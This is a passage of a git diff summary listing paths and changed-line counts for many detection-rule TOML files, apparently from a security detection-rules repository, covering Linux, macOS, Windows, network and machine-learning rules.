...ense_evasion_base64_decoding_activity.toml | 7 +- ...defense_evasion_bpf_program_tampering.toml | 12 +- ...sion_curl_or_wget_executed_via_lolbin.toml | 68 ++++---- ...nse_evasion_directory_creation_in_bin.toml | 12 +- ...doas_configuration_creation_or_rename.toml | 20 ++- ..._evasion_dynamic_linker_file_creation.toml | 20 ++- ...fense_evasion_file_deletion_via_shred.toml | 14 +- ...defense_evasion_file_mod_writable_dir.toml | 8 +- ...hex_payload_execution_via_commandline.toml | 7 +- ...ion_hex_payload_execution_via_utility.toml | 12 +- ...on_interactive_shell_from_system_user.toml | 37 ++++- ...rpreter_launched_from_decoded_payload.toml | 84 +++++----- ...defense_evasion_kill_command_executed.toml | 55 ++++--- ...defense_evasion_kthreadd_masquerading.toml | 7 +- .../defense_evasion_ld_preload_cmdline.toml | 91 ++++++----- .../linux/defense_evasion_ld_so_creation.toml | 12 +- .../defense_evasion_log_files_deleted.toml | 7 +- .../defense_evasion_mount_execution.toml | 7 +- ...evasion_multi_base64_decoding_attempt.toml | 79 ++++----- ...asion_potential_kubectl_impersonation.toml | 35 ++-- ...vasion_potential_kubectl_masquerading.toml | 38 ++++- .../defense_evasion_rename_esxi_files.toml | 15 +- ...s_utility_executed_via_tmux_or_screen.toml | 46 +++++- ...fense_evasion_suspicious_path_mounted.toml | 7 +- ...vasion_symlink_binary_to_writable_dir.toml | 41 +++-- ...vasion_sysctl_kernel_feature_activity.toml | 27 ++-- ...ense_evasion_unusual_preload_env_vars.toml | 19 ++- ...efense_evasion_user_or_group_deletion.toml | 15 +- ...r_log_file_creation_by_unsual_process.toml | 13 +- .../discovery_docker_socket_discovery.toml | 15 +- .../discovery_dynamic_linker_via_od.toml | 25 ++- .../discovery_esxi_software_via_find.toml | 7 +- .../discovery_esxi_software_via_grep.toml | 7 +- ...ion_discovery_via_kprobes_and_tracefs.toml | 7 +- .../discovery_kernel_module_enumeration.toml | 8 +- rules/linux/discovery_kernel_seeking.toml | 15 +- rules/linux/discovery_kernel_unpacking.toml | 7 +- .../discovery_kubeconfig_file_discovery.toml | 25 ++- ...iscovery_kubectl_permission_discovery.toml | 7 +- .../linux/discovery_linux_hping_activity.toml | 10 +- .../linux/discovery_linux_nping_activity.toml | 16 +- ..._mount_discovery_via_exports_or_fstab.toml | 7 +- .../discovery_pam_version_discovery.toml | 7 +- .../linux/discovery_ping_sweep_detected.toml | 8 +- .../discovery_polkit_version_discovery.toml | 7 +- ...ivate_key_password_searching_activity.toml | 12 +- .../linux/discovery_process_capabilities.toml | 7 +- ...curity_file_access_via_common_utility.toml | 25 ++- ...anning_activity_from_compromised_host.toml | 7 +- ...very_sudo_allowed_command_enumeration.toml | 29 +++- ...overy_suspicious_memory_grep_activity.toml | 7 +- ...etwork_tool_launched_inside_container.toml | 15 +- ...ry_suspicious_which_command_execution.toml | 13 +- ...overy_unusual_user_enumeration_via_id.toml | 22 ++- ...covery_virtual_machine_fingerprinting.toml | 30 +++- .../discovery_yum_dnf_plugin_detection.toml | 12 +- ...tion_abnormal_process_id_file_created.toml | 19 ++- ...ment_binary_launched_inside_container.toml | 15 +- ...tion_cupsd_foomatic_rip_file_creation.toml | 12 +- ..._cupsd_foomatic_rip_lp_user_execution.toml | 12 +- ...on_cupsd_foomatic_rip_shell_execution.toml | 15 +- ...omatic_rip_suspicious_child_execution.toml | 70 +++++++- ...nnection_from_entrypoint_in_container.toml | 15 +- .../execution_executable_stack_execution.toml | 15 +- ...n_file_execution_followed_by_deletion.toml | 33 +++- ...executable_via_chmod_inside_container.toml | 30 +++- ...er_or_listener_established_via_netcat.toml | 33 +++- .../execution_kubectl_apply_pod_from_url.toml | 12 +- ...s_direct_api_request_via_curl_or_wget.toml | 25 ++- .../execution_nc_listener_via_rlwrap.toml | 15 +- ...ion_netcon_from_rwx_mem_region_binary.toml | 20 ++- ...cution_network_event_post_compilation.toml | 7 +- rules/linux/execution_perl_tty_shell.toml | 7 +- ...xecution_potential_hack_tool_executed.toml | 83 +++++++++- ..._overly_permissive_container_creation.toml | 8 +- ...rocess_backgrounded_by_unusual_parent.toml | 18 ++- ..._process_started_from_process_id_file.toml | 26 ++- ...ss_started_in_shared_memory_directory.toml | 15 +- rules/linux/execution_python_tty_shell.toml | 7 +- ..._remote_code_execution_via_postgresql.toml | 15 +- .../execution_shell_evasion_linux_binary.toml | 18 ++- ...cution_shell_openssl_client_or_server.toml | 12 +- ...xecution_shell_via_background_process.toml | 7 +- ...ion_shell_via_child_tcp_utility_linux.toml | 7 +- ...on_shell_via_lolbin_interpreter_linux.toml | 12 +- ...execution_shell_via_meterpreter_linux.toml | 30 +++- ...execution_shell_via_suspicious_binary.toml | 7 +- ...ution_shell_via_tcp_cli_utility_linux.toml | 7 +- ...ution_shell_via_udp_cli_utility_linux.toml | 17 +- ...traction_or_decrompression_via_funzip.toml | 7 +- ...us_executable_running_system_commands.toml | 39 ++++- ...icious_mining_process_creation_events.toml | 33 +++- ..._container_creation_command_execution.toml | 77 ++++++++- ..._system_binary_file_permission_change.toml | 38 ++++- rules/linux/execution_tc_bpf_filter.toml | 20 ++- ...nknown_rwx_mem_region_binary_executed.toml | 19 ++- .../execution_unusual_kthreadd_execution.toml | 48 ++++-- ...ual_path_invocation_from_command_line.toml | 13 +- .../execution_unusual_pkexec_execution.toml | 24 ++- ...tion_potential_curl_data_exfiltration.toml | 30 ++-- ...ntial_data_splitting_for_exfiltration.toml | 7 +- ...filtration_potential_database_dumping.toml | 36 +++-- ...tion_potential_wget_data_exfiltration.toml | 31 ++-- ...nusual_file_transfer_utility_launched.toml | 17 +- .../impact_data_encrypted_via_openssl.toml | 15 +- .../impact_memory_swap_modification.toml | 7 +- ...otential_bruteforce_malware_infection.toml | 15 +- .../linux/impact_process_kill_threshold.toml | 19 ++- ...e_2023_50164_exploitation_to_webshell.toml | 21 ++- ..._first_time_public_key_authentication.toml | 30 +++- ...sful_ssh_authentication_by_unusual_ip.toml | 25 ++- ...ul_ssh_authentication_by_unusual_user.toml | 30 +++- ...ccess_telnet_auth_bypass_envar_auditd.toml | 19 ++- ...ess_telnet_auth_bypass_via_user_envar.toml | 19 ++- ...ral_movement_kubeconfig_file_activity.toml | 26 ++- ...ote_file_creation_world_writeable_dir.toml | 14 +- ...lateral_movement_ssh_it_worm_download.toml | 15 +- ...ment_telnet_network_activity_external.toml | 15 +- ...movement_unusual_remote_file_creation.toml | 14 +- ...istence_apt_package_manager_execution.toml | 7 +- ...nce_apt_package_manager_file_creation.toml | 20 ++- ...ersistence_apt_package_manager_netcon.toml | 20 ++- rules/linux/persistence_at_job_creation.toml | 38 +---- rules/linux/persistence_boot_file_copy.toml | 10 +- .../persistence_bpf_program_or_map_load.toml | 20 ++- .../persistence_chkconfig_service_add.toml | 7 +- ...credential_access_modify_ssh_binaries.toml | 7 +- .../linux/persistence_cron_job_creation.toml | 38 +---- .../persistence_dbus_service_creation.toml | 12 +- ...e_dbus_unsual_daemon_parent_execution.toml | 7 +- ..._package_manager_plugin_file_creation.toml | 30 +++- ...kage_installation_from_unusual_parent.toml | 19 ++- .../persistence_dpkg_unusual_execution.toml | 32 +++- .../persistence_dracut_module_creation.toml | 7 +- .../persistence_dynamic_linker_backup.toml | 20 ++- .../linux/persistence_git_hook_execution.toml | 7 +- .../persistence_git_hook_file_creation.toml | 7 +- rules/linux/persistence_git_hook_netcon.toml | 20 ++- ...ersistence_git_hook_process_execution.toml | 7 +- ...rsistence_grub_configuration_creation.toml | 15 +- rules/linux/persistence_grub_makeconfig.toml | 15 +- .../persistence_init_d_file_creation.toml | 25 ++- ...ersistence_kde_autostart_modification.toml | 7 +- .../linux/persistence_kernel_driver_load.toml | 26 ++- ...stence_kernel_driver_load_by_non_root.toml | 20 ++- ...nel_module_load_from_unusual_location.toml | 20 ++- ...rsistence_kernel_object_file_creation.toml | 19 ++- ...ce_kubernetes_sensitive_file_activity.toml | 51 ++++-- .../persistence_kworker_file_creation.toml | 12 +- ...sistence_linux_backdoor_user_creation.toml | 20 ++- .../persistence_linux_group_creation.toml | 12 +- ...e_linux_shell_activity_via_web_server.toml | 15 +- ..._linux_user_added_to_privileged_group.toml | 30 +++- .../persistence_manual_dracut_execution.toml | 15 +- ...rsistence_message_of_the_day_creation.toml | 15 +- ...sistence_message_of_the_day_execution.toml | 43 ++++- ...etwork_manager_dispatcher_persistence.toml | 7 +- ...stence_openssl_passwd_hash_generation.toml | 7 +- ...ggable_authentication_module_creation.toml | 17 +- ...cation_module_creation_in_unusual_dir.toml | 17 +- ...ication_module_pam_exec_backdoor_exec.toml | 25 ++- ...authentication_module_source_download.toml | 20 ++- .../persistence_polkit_policy_creation.toml | 20 ++- ...persistence_script_executable_bit_set.toml | 30 +++- ...nce_process_capability_set_via_setcap.toml | 20 ++- .../linux/persistence_pth_file_creation.toml | 25 ++- ...persistence_rc_local_error_via_syslog.toml | 20 ++- ...ence_rc_local_service_already_running.toml | 20 ++- .../linux/persistence_rc_script_creation.toml | 20 ++- ...sistence_setuid_setgid_capability_set.toml | 20 ++- .../persistence_shadow_file_modification.toml | 12 +- .../persistence_shared_object_creation.toml | 37 ++++- ...ence_shell_configuration_modification.toml | 20 ++- ...simple_web_server_connection_accepted.toml | 76 +++++---- ...ersistence_simple_web_server_creation.toml | 12 +- ...site_and_user_customize_file_creation.toml | 25 ++- rules/linux/persistence_ssh_netcon.toml | 7 +- ...stence_ssh_via_backdoored_system_user.toml | 39 ++++- ...suspicious_file_opened_through_editor.toml | 43 ++++- ...e_suspicious_ssh_execution_xzbackdoor.toml | 20 ++- ...ersistence_systemd_generator_creation.toml | 12 +- rules/linux/persistence_systemd_netcon.toml | 15 +- ...tence_systemd_scheduled_timer_created.toml | 20 ++- .../persistence_systemd_service_creation.toml | 20 +-- .../persistence_systemd_service_started.toml | 19 ++- .../persistence_systemd_shell_execution.toml | 20 ++- ...ersistence_tainted_kernel_module_load.toml | 20 ++- ...ainted_kernel_module_out_of_tree_load.toml | 20 ++- .../linux/persistence_udev_rule_creation.toml | 25 ++- ...ce_unpack_initramfs_via_unmkinitramfs.toml | 17 +- ...rsistence_unusual_exim4_child_process.toml | 27 +++- .../persistence_unusual_pam_grantor.toml | 18 ++- ...ersistence_unusual_sshd_child_process.toml | 19 ++- ...user_credential_modification_via_echo.toml | 15 +- ...ser_or_group_creation_or_modification.toml | 25 ++- ...sistence_web_server_sus_child_spawned.toml | 30 +++- ...ence_web_server_sus_command_execution.toml | 15 +- ...tence_web_server_sus_destination_port.toml | 39 +++-- ..._web_server_unusual_command_execution.toml | 14 +- .../persistence_xdg_autostart_netcon.toml | 20 ++- ..._package_manager_plugin_file_creation.toml | 7 +- ...on_chown_chmod_unauthorized_file_read.toml | 20 ++- ...ation_container_util_misconfiguration.toml | 15 +- ...cve_2025_32463_nsswitch_file_creation.toml | 12 +- ..._cve_2025_32463_sudo_chroot_execution.toml | 30 +++- ...scalation_cve_2025_41244_vmtoolsd_lpe.toml | 12 +- .../privilege_escalation_dac_permissions.toml | 29 +++- ...ion_debugfs_launched_inside_container.toml | 15 +- ...calation_docker_release_file_creation.toml | 20 ++- ...calation_enlightenment_window_manager.toml | 13 +- ...e_escalation_gdb_sys_ptrace_elevation.toml | 10 +- ...lege_escalation_gdb_sys_ptrace_netcon.toml | 31 +++- ...lege_escalation_kworker_uid_elevation.toml | 18 ++- ...lation_ld_preload_shared_object_modif.toml | 37 ++++- ...lation_linux_suspicious_symbolic_link.toml | 33 +++- ...n_load_and_unload_of_kernel_via_kexec.toml | 7 +- ...alation_looney_tunables_cve_2023_4911.toml | 13 +- ...ge_escalation_overlayfs_local_privesc.toml | 8 +- ...vilege_escalation_pkexec_envar_hijack.toml | 23 ++- ...tion_potential_suid_sgid_exploitation.toml | 20 ++- ...n_potential_suid_sgid_proxy_execution.toml | 22 ++- ...lation_potential_wildcard_shell_spawn.toml | 12 +- ...ge_escalation_sda_disk_mount_non_root.toml | 28 +++- ...on_snap_confine_lpe_via_cve_2026_3888.toml | 7 +- ...vilege_escalation_sudo_cve_2019_14287.toml | 12 +- .../privilege_escalation_sudo_hijacking.toml | 20 ++- ...tion_sudo_token_via_process_injection.toml | 35 +++- ...uspicious_cap_setuid_python_execution.toml | 20 ++- ...ion_suspicious_chown_fowner_elevation.toml | 24 ++- ...calation_suspicious_passwd_file_write.toml | 21 ++- ...alation_suspicious_uid_guid_elevation.toml | 20 ++- ...scalation_uid_change_post_compilation.toml | 12 +- ...uid_elevation_from_unknown_executable.toml | 13 +- ...lation_unshare_namespace_manipulation.toml | 7 +- ...ege_escalation_writable_docker_socket.toml | 16 +- ...ery_output_written_to_suspicious_file.toml | 54 ++++--- ...e_file_access_followed_by_compression.toml | 47 +++--- ..._control_aws_s3_connection_via_script.toml | 70 +++++--- ...control_google_calendar_c2_via_script.toml | 74 +++++---- ...rol_network_connection_to_oast_domain.toml | 65 ++++++-- ...trol_perl_outbound_network_connection.toml | 47 +++--- ..._and_control_potential_etherhiding_c2.toml | 84 +++++----- ...reter_connection_to_non_standard_port.toml | 61 +++---- ...uspicious_curl_from_macos_application.toml | 46 ++++-- ..._suspicious_curl_to_google_app_script.toml | 50 +++--- ..._outbound_network_via_unsigned_binary.toml | 36 +++-- ..._connection_to_suspicious_web_service.toml | 34 +++- ...dential_access_dumping_hashes_bi_cmds.toml | 8 +- ...dential_access_high_volume_of_pbpaste.toml | 16 +- .../credential_access_kerberosdump_kcc.toml | 10 +- ...s_keychain_pwd_retrieval_security_cmd.toml | 12 +- ...ential_access_mitm_localhost_webproxy.toml | 19 ++- ...access_potential_macos_ssh_bruteforce.toml | 16 +- ...al_access_promt_for_pwd_via_osascript.toml | 23 ++- ...ensitive_file_access_first_occurrence.toml | 30 +++- ...ous_web_browser_sensitive_file_access.toml | 18 ++- .../credential_access_systemkey_dumping.toml | 18 ++- ...vasion_apple_softupdates_modification.toml | 10 +- ...evasion_attempt_del_quarantine_attrib.toml | 17 +- ...evasion_attempt_to_disable_gatekeeper.toml | 8 +- ..._evasion_dylib_injection_via_env_vars.toml | 68 +++++--- ...ion_gatekeeper_override_and_execution.toml | 68 +++++--- ..._evasion_modify_environment_launchctl.toml | 12 +- ...cy_controls_tcc_database_modification.toml | 17 +- ...tion_privacy_pref_sshd_fulldiskaccess.toml | 19 ++- .../defense_evasion_safari_config_change.toml | 10 +- ...dboxed_office_app_suspicious_zip_file.toml | 15 +- ...evasion_suspicious_tcc_access_granted.toml | 60 ++++--- ...vasion_tcc_bypass_mounted_apfs_access.toml | 16 +- .../discovery_full_disk_access_check.toml | 60 ++++--- .../macos/discovery_suspicious_sip_check.toml | 58 ++++--- ...ystem_and_network_configuration_check.toml | 26 +-- ...covery_users_domain_built_in_commands.toml | 15 +- ...vasion_electron_app_childproc_node_js.toml | 11 +- ...l_access_suspicious_browser_childproc.toml | 44 ++++- ...staller_package_spawned_network_event.toml | 30 +++- ...n_python_shell_spawn_first_occurrence.toml | 10 +- ...cution_script_via_automator_workflows.toml | 8 +- ...ing_osascript_exec_followed_by_netcon.toml | 15 +- ...n_shell_execution_via_apple_scripting.toml | 13 +- ...ution_unusual_library_load_via_python.toml | 31 ++-- ...uspicious_mac_ms_office_child_process.toml | 48 +++++- ...ential_access_kerberos_bifrostconsole.toml | 51 +++++- ...ral_movement_remote_ssh_login_enabled.toml | 18 ++- ...ment_suspicious_curl_to_jamf_endpoint.toml | 56 ++++--- ...teral_movement_vpn_connection_attempt.toml | 16 +- ...stence_account_creation_hide_at_logon.toml | 29 +++- ...sistence_apple_mail_rule_modification.toml | 47 ++++-- ...ce_creation_change_launch_agents_file.toml | 26 ++- ..._creation_hidden_login_item_osascript.toml | 16 +- ..._access_authorization_plugin_creation.toml | 18 ++- rules/macos/persistence_crontab_creation.toml | 23 ++- ...ence_curl_execution_via_shell_profile.toml | 60 ++++--- ...launch_agent_deamon_logonitem_process.toml | 15 +- ...rectory_services_plugins_modification.toml | 8 +- ...e_docker_shortcuts_plist_modification.toml | 13 +- ...persistence_emond_rules_file_creation.toml | 23 ++- ...istence_emond_rules_process_execution.toml | 56 ++++++- .../persistence_enable_root_account.toml | 23 ++- ...n_hidden_launch_agent_deamon_creation.toml | 15 +- ...istence_folder_action_scripts_runtime.toml | 11 +- ...rsistence_login_logout_hooks_defaults.toml | 8 +- ...stence_loginwindow_plist_modification.toml | 18 ++- ...nce_manual_chromium_extension_loading.toml | 52 ++++-- ...t_or_daemon_creation_first_occurrence.toml | 10 +- ...e_screensaver_plist_file_modification.toml | 8 +- ..._file_creation_via_pkg_install_script.toml | 44 +++-- ...tence_via_atom_init_file_modification.toml | 8 +- ...calation_applescript_with_admin_privs.toml | 19 ++- ...calation_explicit_creds_via_scripting.toml | 28 +++- ..._escalation_local_user_added_to_admin.toml | 13 +- ..._escalation_user_added_to_admin_group.toml | 13 +- ...d_control_ml_packetbeat_dns_tunneling.toml | 26 ++- ...ntrol_ml_packetbeat_rare_dns_question.toml | 34 +++- ...d_and_control_ml_packetbeat_rare_urls.toml | 21 ++- ..._ml_auth_spike_in_failed_logon_events.toml | 13 +- ..._access_ml_auth_spike_in_logon_events.toml | 19 ++- ...pike_in_logon_events_from_a_source_ip.toml | 13 +- ...ml_windows_anomalous_metadata_process.toml | 18 ++- ...execution_ml_windows_anomalous_script.toml | 23 ++- ...ess_ml_auth_rare_source_ip_for_a_user.toml | 16 +- ...windows_rare_user_type10_remote_login.toml | 21 ++- .../ml_high_count_events_for_a_host_name.toml | 69 +++++--- rules/ml/ml_high_count_network_denies.toml | 59 ++++--- ...linux_anomalous_network_port_activity.toml | 31 ++-- .../ml_low_count_events_for_a_host_name.toml | 25 +-- .../ml/ml_packetbeat_rare_server_domain.toml | 41 +++-- rules/ml/ml_rare_destination_country.toml | 54 +++++-- .../ml/ml_spike_in_traffic_to_a_country.toml | 51 +++--- ...ml_windows_anomalous_network_activity.toml | 41 +++-- ...tence_ml_rare_process_by_host_windows.toml | 23 ++- ...ml_windows_anomalous_process_creation.toml | 31 +++- ...sistence_ml_windows_anomalous_service.toml | 23 ++- ...tion_ml_linux_anomalous_sudo_activity.toml | 20 +-- ...tion_ml_windows_rare_user_runas_event.toml | 18 ++- ..._ml_linux_anomalous_compiler_activity.toml | 31 +++- .../collection_fortigate_config_download.toml | 24 ++- ...cepted_default_telnet_port_connection.toml | 19 ++- ...mand_and_control_cobalt_strike_beacon.toml | 12 +- ...cobalt_strike_default_teamserver_cert.toml | 10 +- .../command_and_control_fin7_c2_behavior.toml | 12 +- .../command_and_control_halfbaked_beacon.toml | 12 +- ...d_control_nat_traversal_port_activity.toml | 18 ++- .../command_and_control_port_26_activity.toml | 21 ++- ...te_desktop_protocol_from_the_internet.toml | 17 +- ...l_network_computing_from_the_internet.toml | 13 +- ...ual_network_computing_to_the_internet.toml | 21 ++- ...very_potential_network_sweep_detected.toml | 8 +- ...rtigate_sso_login_from_unusual_source.toml | 26 ++- ...mote_procedure_call_from_the_internet.toml | 10 +- ...remote_procedure_call_to_the_internet.toml | 21 ++- ...al_access_unsecure_elasticsearch_node.toml | 16 +- .../lateral_movement_dns_server_overflow.toml | 21 ++- ..._sso_login_followed_by_admin_creation.toml | 19 ++- .../execution_endgame_exploit_detected.toml | 11 +- .../execution_endgame_exploit_prevented.toml | 11 +- ...ion_endgame_permission_theft_detected.toml | 8 +- ...on_endgame_permission_theft_prevented.toml | 8 +- ...ion_email_powershell_exchange_mailbox.toml | 17 +- .../collection_mailbox_export_winlog.toml | 12 +- .../collection_posh_audio_capture.toml | 21 ++- .../command_and_control_certreq_postdata.toml | 21 ++- ...ommand_and_control_common_webservices.toml | 51 ++++-- .../command_and_control_dns_susp_tld.toml | 26 ++- .../command_and_control_iexplore_via_com.toml | 34 +++- ...ontrol_multiple_rmm_vendors_same_host.toml | 9 +- ...control_new_terms_commonly_abused_rmm.toml | 15 +- ...command_and_control_outlook_home_page.toml | 13 +- ...ontrol_port_forwarding_added_registry.toml | 18 ++- .../command_and_control_rdp_tunnel_plink.toml | 15 +- .../command_and_control_remcos_rat_iocs.toml | 39 ++++- ..._and_control_remote_file_copy_scripts.toml | 13 +- ...d_and_control_screenconnect_childproc.toml | 97 ++++++++++- ...nd_and_control_tool_transfer_via_curl.toml | 26 ++- ...ommand_and_control_tunnel_cloudflared.toml | 13 +- .../command_and_control_tunnel_yuze.toml | 26 ++- ..._control_velociraptor_shell_execution.toml | 44 ++++- ...ential_access_browsers_unusual_parent.toml | 20 ++- ...redential_access_dcsync_user_backdoor.toml | 18 ++- ...ntial_access_disable_kerberos_preauth.toml | 26 ++- .../credential_access_dnsnode_creation.toml | 8 +- ..._access_dollar_account_relay_kerberos.toml | 18 ++- ...cess_domain_backup_dpapi_private_keys.toml | 17 +- ..._access_iis_connectionstrings_dumping.toml | 13 +- ...ccess_imageload_azureadconnectauthsvc.toml | 21 ++- ..._access_kerberoasting_unusual_process.toml | 21 ++- .../credential_access_kerberos_coerce.toml | 17 +- ...credential_access_kerberos_coerce_dns.toml | 17 +- .../credential_access_ldap_attributes.toml | 26 ++- ...edential_access_lsass_loaded_susp_dll.toml | 23 ++- ...tial_access_machine_account_smb_relay.toml | 23 ++- ...l_access_mimikatz_memssp_default_logs.toml | 24 ++- ...ial_access_mimikatz_powershell_module.toml | 26 ++- ..._access_mod_wdigest_security_provider.toml | 18 ++- ...l_access_moving_registry_hive_via_smb.toml | 23 ++- ...e_network_logon_provider_modification.toml | 11 +- ...edential_access_posh_invoke_ninjacopy.toml | 22 ++- ...edential_access_posh_kerb_ticket_dump.toml | 19 ++- .../credential_access_posh_relay_tools.toml | 19 ++- .../credential_access_posh_veeam_sql.toml | 20 ++- ...ential_access_rare_webdav_destination.toml | 21 ++- ...ial_access_regback_sam_security_hives.toml | 9 +- ...cess_relay_ntlm_auth_via_http_spoolss.toml | 18 ++- .../credential_access_shadow_credentials.toml | 16 +- ...dential_access_spn_attribute_modified.toml | 18 ++- ...l_access_suspicious_comsvcs_imageload.toml | 22 ++- ...cious_winreg_access_via_sebackup_priv.toml | 13 +- ..._symbolic_link_to_shadow_copy_created.toml | 18 ++- .../credential_access_veeam_commands.toml | 21 ++- ...dential_access_web_config_file_access.toml | 23 ++- ...dential_access_wireless_creds_dumping.toml | 18 ++- ...efense_evasion_amsi_bypass_powershell.toml | 22 ++- ...e_evasion_clearing_windows_event_logs.toml | 12 +- ...ication_apps_suspicious_child_process.toml | 21 ++- ...e_evasion_create_mod_root_certificate.toml | 18 ++- .../windows/defense_evasion_disable_nla.toml | 24 ++- ...vasion_dotnet_compiler_parent_process.toml | 46 +++++- ...evasion_enable_inbound_rdp_with_netsh.toml | 23 ++- ...ense_evasion_execution_lolbas_wuauclt.toml | 16 +- ...ecution_msbuild_started_by_office_app.toml | 18 ++- ...n_execution_msbuild_started_by_script.toml | 21 ++- ...ion_msbuild_started_by_system_process.toml | 13 +- ...cution_msbuild_started_unusal_process.toml | 25 ++- ...sion_execution_windefend_unusual_path.toml | 22 ++- ...sion_hide_encoded_executable_registry.toml | 15 +- ...ense_evasion_iis_httplogging_disabled.toml | 12 +- ...defense_evasion_indirect_exec_conhost.toml | 29 +++- ...defense_evasion_indirect_exec_openssh.toml | 8 +- .../defense_evasion_injection_msbuild.toml | 19 +-- ...efense_evasion_lolbas_win_cdb_utility.toml | 15 +- ...e_evasion_lsass_ppl_disabled_registry.toml | 24 ++- ...querading_as_elastic_endpoint_process.toml | 13 +- ...e_evasion_masquerading_renamed_autoit.toml | 23 ++- ...erading_suspicious_werfault_childproc.toml | 30 ++-- ..._evasion_microsoft_defender_tampering.toml | 8 +- ...on_msbuild_making_network_connections.toml | 18 ++- .../defense_evasion_mshta_susp_child.toml | 34 +++- ...efense_evasion_msiexec_remote_payload.toml | 18 ++- .../defense_evasion_msxsl_network.toml | 16 +- ...etwork_connection_from_windows_binary.toml | 45 +++++- ...e_evasion_parent_process_pid_spoofing.toml | 24 +-- ...persistence_account_tokenfilterpolicy.toml | 20 ++- .../defense_evasion_posh_assembly_load.toml | 15 +- .../defense_evasion_posh_compressed.toml | 15 +- .../defense_evasion_posh_encryption.toml | 21 ++- .../defense_evasion_posh_high_entropy.toml | 16 +- .../defense_evasion_posh_obfuscation.toml | 15 +- ...nse_evasion_posh_obfuscation_backtick.toml | 15 +- ...evasion_posh_obfuscation_backtick_var.toml | 15 +- ..._evasion_posh_obfuscation_char_arrays.toml | 15 +- ...asion_posh_obfuscation_concat_dynamic.toml | 15 +- ...sh_obfuscation_high_number_proportion.toml | 15 +- ...fuscation_iex_env_vars_reconstruction.toml | 15 +- ...obfuscation_iex_string_reconstruction.toml | 15 +- ...asion_posh_obfuscation_index_reversal.toml | 15 +- ...sion_posh_obfuscation_reverse_keyword.toml | 15 +- ...vasion_posh_obfuscation_string_concat.toml | 15 +- ...vasion_posh_obfuscation_string_format.toml | 15 +- ...scation_whitespace_special_proportion.toml | 15 +- ...efense_evasion_posh_process_injection.toml | 15 +- ...ense_evasion_proxy_execution_via_msdt.toml | 26 ++- ...eg_disable_enableglobalqueryblocklist.toml | 15 +- ...efense_evasion_regmod_remotemonologue.toml | 21 ++- ...fense_evasion_sccm_scnotification_dll.toml | 8 +- .../defense_evasion_script_via_html_app.toml | 28 +++- ...ackdoor_service_disabled_via_registry.toml | 23 ++- ..._evasion_suspicious_certutil_commands.toml | 34 +++- ...picious_execution_from_mounted_device.toml | 38 ++++- ...n_suspicious_managedcode_host_process.toml | 34 +++- ...suspicious_process_creation_calltrace.toml | 8 +- ...efense_evasion_suspicious_scrobj_load.toml | 18 ++- ...defense_evasion_suspicious_wmi_script.toml | 13 +- ...evasion_suspicious_zoom_child_process.toml | 23 ++- ..._critical_proc_abnormal_file_activity.toml | 19 ++- ...fense_evasion_untrusted_driver_loaded.toml | 13 +- ...nusual_network_connection_via_dllhost.toml | 16 +- ...on_unusual_process_network_connection.toml | 28 +++- ...vasion_wdac_policy_by_unusual_process.toml | 8 +- ...se_evasion_windows_filtering_platform.toml | 12 +- ...evasion_workfolders_control_execution.toml | 23 ++- .../defense_evasion_wsl_bash_exec.toml | 26 ++- .../defense_evasion_wsl_child_process.toml | 21 ++- .../defense_evasion_wsl_enabled_via_dism.toml | 8 +- .../defense_evasion_wsl_filesystem.toml | 21 ++- .../defense_evasion_wsl_kalilinux.toml | 21 ++- ...nse_evasion_wsl_registry_modification.toml | 21 ++- ...discovery_active_directory_webservice.toml | 23 ++- .../discovery_command_system_account.toml | 13 +- .../discovery_high_number_ad_properties.toml | 23 ++- ...scovery_host_public_ip_address_lookup.toml | 11 +- ...scovery_posh_suspicious_api_functions.toml | 43 ++++- .../discovery_whoami_command_activity.toml | 8 +- .../windows/execution_com_object_xwizard.toml | 18 ++- ...and_prompt_connecting_to_the_internet.toml | 16 +- ...tion_command_shell_started_by_svchost.toml | 13 +- ...tion_delayed_via_ping_lolbas_unsigned.toml | 34 +++- .../execution_downloaded_url_file.toml | 13 +- .../execution_enumeration_via_wmiprvse.toml | 38 ++++- .../execution_from_unusual_path_cmdline.toml | 48 +++++- ...le_program_connecting_to_the_internet.toml | 23 ++- ...cution_initial_access_foxmail_exploit.toml | 11 +- ...execution_initial_access_via_msc_file.toml | 28 +++- ...cution_initial_access_wps_dll_exploit.toml | 29 +++- .../execution_ms_office_written_file.toml | 23 ++- .../execution_nodejs_susp_patterns.toml | 20 ++- ...cution_notepad_markdown_child_process.toml | 12 +- .../execution_posh_hacktool_functions.toml | 150 +++++++++++++++++- .../execution_posh_portable_executable.toml | 20 ++- ...on_powershell_susp_args_via_winscript.toml | 26 ++- .../execution_revshell_cmd_via_netcat.toml | 17 +- ...tion_scheduled_task_powershell_source.toml | 25 ++- .../execution_scripting_remote_webdav.toml | 33 +++- .../execution_scripts_archive_file.toml | 21 ++- ...xecution_shared_modules_local_sxs_dll.toml | 21 ++- .../execution_susp_javascript_via_deno.toml | 30 +++- .../windows/execution_suspicious_cmd_wmi.toml | 23 ++- .../execution_suspicious_pdf_reader.toml | 92 ++++++++++- .../execution_suspicious_psexesvc.toml | 28 +++- .../execution_via_compiled_html_file.toml | 30 +++- .../execution_via_hidden_shell_conhost.toml | 21 +-- ...ion_via_mmc_console_file_unusual_path.toml | 18 ++- ...execution_windows_cmd_shell_susp_args.toml | 46 +++++- .../execution_windows_fakecaptcha_cmd_ps.toml | 29 +++- .../execution_windows_phish_clickfix.toml | 30 +++- ...xecution_windows_powershell_susp_args.toml | 41 ++++- ...xecution_windows_script_from_internet.toml | 29 +++- .../exfiltration_rclone_cloud_upload.toml | 31 +++- .../exfiltration_smb_rare_destination.toml | 16 +- ...pact_high_freq_file_renames_by_kernel.toml | 17 +- .../windows/impact_mod_critical_os_files.toml | 14 +- .../impact_ransomware_file_rename_smb.toml | 15 +- .../impact_ransomware_note_file_over_smb.toml | 15 +- ...impact_stop_process_service_threshold.toml | 21 ++- ...e_shadow_copy_deletion_via_powershell.toml | 15 +- ..._evasion_suspicious_htm_file_creation.toml | 28 +++- ...itial_access_execution_from_inetcache.toml | 26 ++- ...l_access_execution_remote_via_msiexec.toml | 23 ++- ...al_access_execution_via_office_addins.toml | 33 +++- ...ial_access_exploit_jetbrains_teamcity.toml | 89 ++++++++++- ..._access_potential_webhelpdesk_exploit.toml | 49 +++++- ...itial_access_rdp_file_mail_attachment.toml | 23 ++- ...al_access_script_executing_powershell.toml | 15 +- ...ccess_scripts_process_started_via_wmi.toml | 15 +- ...cious_execution_from_vscode_extension.toml | 63 +++++++- ...l_access_suspicious_ms_exchange_files.toml | 24 ++- ...ious_ms_exchange_worker_child_process.toml | 26 ++- ...ss_suspicious_ms_office_child_process.toml | 92 ++++++++++- ...s_suspicious_ms_outlook_child_process.toml | 49 +++++- 